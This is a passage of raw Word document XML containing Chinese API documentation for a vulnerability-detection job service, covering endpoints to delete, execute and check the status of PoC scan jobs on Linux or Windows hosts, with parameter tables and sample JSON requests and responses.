        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C572C2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0746109E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25F82A35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="626D7C7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4D4DEE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/api/vul/poc/job/linux/5c3fe2c77d761b1e0a8b5c2a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B375BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B871B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EF0060"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630"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="57A4FE7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5EE31A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DF29D4B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F891BBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09FA052B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5ECFD58F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FC3E044" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="487F8F42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60A7A8DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B06614F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否删除成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6640C230" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="开始作业执行"/>
      <w:bookmarkEnd w:id="120"/>
      <w:r>
        <w:t>开始作业执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D669336" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432A6E69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/{linux|win}/execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDA8C48"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974"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="325DA8E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44493B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65E3294B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56B41855" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="561658E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1C944D39" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E267479" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="344F20C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AA90519" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="213580A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="176D7644" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0063480C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BCF9AA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="666CA52D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71099386" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业类型：1：全局作业 2：用户作业。必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D5EC879" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183DA586" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/linux/execute</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"jobId":"5c3d7c7a7d761b6b1c9048fd","jobType":2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003B7CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF4787" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5458033F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回部分说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1791"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0BE8647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F8175CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34914B95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="450D749C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303F6A93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="332FF5CC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D621120" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6637DCCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="081E9F22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19CB9C18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否开始执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51F56BF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="查询漏洞检测作业执行状态"/>
      <w:bookmarkEnd w:id="121"/>
      <w:r>
        <w:t>查询漏洞检测作业执行状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3C19A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB01E16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/{linux|win}/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327F21B6"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974"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1E14A5E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23D1649" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C8CE030" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="138159F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64655256" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2B03D9FF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="192C6D27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58641E6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13F00A5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AC9CE7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5CD05E57" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DCEC8DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10FC3C66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37A5C96E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E2D5986" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业类型：1：全局作业 2：用户作业。必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40C028C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E8B608" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/linux/status</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"jobId":"5c3d7c7a7d761b6b1c9048fd","jobType":2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489C07AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DF6F96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5c4182e87d761b3224c4293e",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": "Running"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC88B03"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1333"/>
        <w:gridCol w:w="3172"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3DC8802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A89AA6F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E5C54F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77337B9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D1A1C9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63D27248" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FE89508" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28AA3756" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2519B982" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66EE6CD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E8497AB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B772FDE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="467406DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C37C3AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Varchar(7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="325A553B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描的状态（进行中/成功/失败）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FBB4FCA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="查询作业执行失败主机"/>
      <w:bookmarkEnd w:id="122"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>查询作业执行失败主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF0DBF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36335591" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/{linux|win}/error_host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A667669"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974"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="594F53D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7D99912" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71D23C33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="295C69B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
